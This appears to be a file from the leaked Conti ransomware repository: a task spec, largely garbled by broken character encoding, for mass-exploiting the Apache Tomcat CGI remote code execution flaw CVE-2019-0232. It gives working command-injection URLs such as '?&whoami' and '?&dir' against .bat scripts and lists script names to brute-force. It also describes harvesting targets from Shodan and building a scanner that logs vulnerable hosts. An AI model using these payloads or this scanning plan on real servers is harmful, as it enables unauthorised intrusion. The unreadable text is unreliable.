Conti Ransomware malware leak WITH LOCKER
You can not select more than 25 topics Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.

108 lines
4.1 KiB

  1. ������ ���������� APACHE TOMCAT/CGI-BIN (CVE-2019-0232)
  2. ����������� �������
  3. ����
  4. ���������� ����������� ������ ������� � ����������� CVE-2019-0232.
  5. EXPLOIT
  6. ���� ��������� - � ������������ ������������� ��������� ������ ������� cgi-bin ������� Apache Tomcat.
  7. ��-�� ����� �������� ��������� ���������� ����.
  8. ���� ���� ������ ����
  9. http://localhost/cgi-bin/hello.bat?&whoami
  10. �� � ���������� ���������� cmd.exe /c "whoami"
  11. ����������� ������� �� �������:
  12. https://blog.trendmicro.com/trendlabs-security-intelligence/uncovering-cve-2019-0232-a-remote-code-execution-vulnerability-in-apache-tomcat/
  13. https://wwws.nightwatchcybersecurity.com/2019/04/30/remote-code-execution-rce-in-cgi-servlet-apache-tomcat-on-windows-cve-2019-0232/
  14. ����������
  15. � �������� ��������� ������������ ����� ������������ ������ https://www.shodan.io/search?query=apache+tomcat
  16. ��� ������� � shodan.io ����� ������. �� �� ���� ��� ��������� ���� ��� ���������� ��� ������ � ����.
  17. ����� �������������� ���������� ������ ������ � ������� .csv � ��������� �� �������� � ���� ����� �������.
  18. ����������� ������������ �������� ������ ������� � ������:
  19. - URL ��������� ������� (http://domain.com/cgi-bin/script.bat?&dir ��������)
  20. - ������ HTTP-����� �� ������, ������� ��� HTTP-��������� � ���� ������
  21. - URL whoami-������� (http://domain.com/cgi-bin/script.bat?&whoami)
  22. - ������ HTTP-����� �� ������ whoami (��.����), ������� ��� HTTP-��������� � ���� ������
  23. �������� ������������ ���������:
  24. 1. ������ ����� shodan.io �� ������ ������, �������� ��������. �������� �� ������ ����� ������.
  25. ���� �������� �� .csv ��� .json-�����, ����������������� � ������� (��� ������� ������ �� �������).
  26. 2. ����� ��������� ����� � ������ �������.
  27. 3. ���� � ���������� ���� ������ ���������� ��, ���������� ��� ��� ������ 7.0.94, 8.5.40 � 9.0.19 �������������.
  28. ���� ������ ������ ��� �����, ���������� �����, ��������� � ����������.
  29. ���� ������ ������ ��� �����������, ����������.
  30. 4. ������ �������
  31. http://domain.com/cgi-bin/hello.bat?&dir
  32. http://domain.com/cgi-bin/hello.bat?&dir
  33. http://domain.com/cgi-bin/test.bat?&dir
  34. http://domain.com/cgi-bin/info.bat?&dir
  35. http://domain.com/cgi-bin/0.bat?&dir
  36. http://domain.com/cgi-bin/1.bat?&dir
  37. ������� ����������, ���� ���� �� ��������� ��� �������� ��������, ���� ���� �� ������� ������ ��� �����.
  38. ��� ����� ������, �������� ������ ����������� - ��� ����� ����� ������ � ������ � ���������, � �������� ���������.
  39. �������� �������� ��� �����:
  40. hello.bat
  41. helloworld.bat
  42. test.bat
  43. index.bat
  44. info.bat
  45. sysinfo.bat
  46. run.bat
  47. tomcat.bat
  48. 0.bat
  49. 1.bat
  50. 2.bat
  51. ...
  52. 10.bat
  53. ����� ����, ��� ������� ����� ������� ����� ��������� ����� �� 0 �� 9 � ��� �����.
  54. �� ����, ��� ����� hello.bat �� ��������� ��������� ��������:
  55. hello.bat
  56. hello0.bat
  57. hello1.bat
  58. ..
  59. hello9.bat
  60. �����: ���������� ������ ���������� �������� ��� ������� ����� �������!
  61. https://www.exploit-db.com/exploits/47073
  62. �����: ������ ��� ��� ��� ������� �������� �����, �.�. �� ������ �� ����� ���� �� �����.
  63. 4. ���� ��� ������� ��� 200 � �����, ������� ���������������� ����� �� ������� ����������:
  64. - ��� ������� dir � ������ ������ ���� ���������� ��������
  65. mm.dd.YYYY HH:mm <DIR> .
  66. mm.dd.YYYY HH:mm <DIR> ..
  67. ���� ���� ������� ������������ � ������:
  68. - ������ ������ http://domain.com/cgi-bin/<script>.bat?&whoami
  69. (����� script - ��� ���� �������, ��� �������� ������� �������� ����� 200 � ������� ���������)
  70. - ��������� � �������������� ������ ������� � ������.
  71. ������ ������ ���� �������� ��������� �������:
  72. * ��� ����� ���� ������ �� ���������������� ���������� ����� (��������, python ��� PowerShell)
  73. * ������ ������ ����� ��� � ������� ��������, � ������ $(script).log, ��� $(script) - ��� ��� ���������� �������
  74. * ��� ������ ����� ������� ����-������� �� ������ �������
  75. * ����������� ����� ���� ������� � ����������� - ������������� ������ ��������� ������
  76. * � ��� ����� ��������� ��������� �������:
  77. - ����� ���������, � �� �������
  78. - ����������� ������ � �����������:
  79. - �����
  80. - ������ �����
  81. - ������ HTTP-������� � ������
  82. ������ � ����� (��� ������� - �������� ������) �������� ����������:
  83. - % ������� ��������������, % �������� ������� �������
  84. - ��� ����������� ����������� ����� ���������� ������ HTTP-������ � ����� (���� ���� �� ��� ��� ������).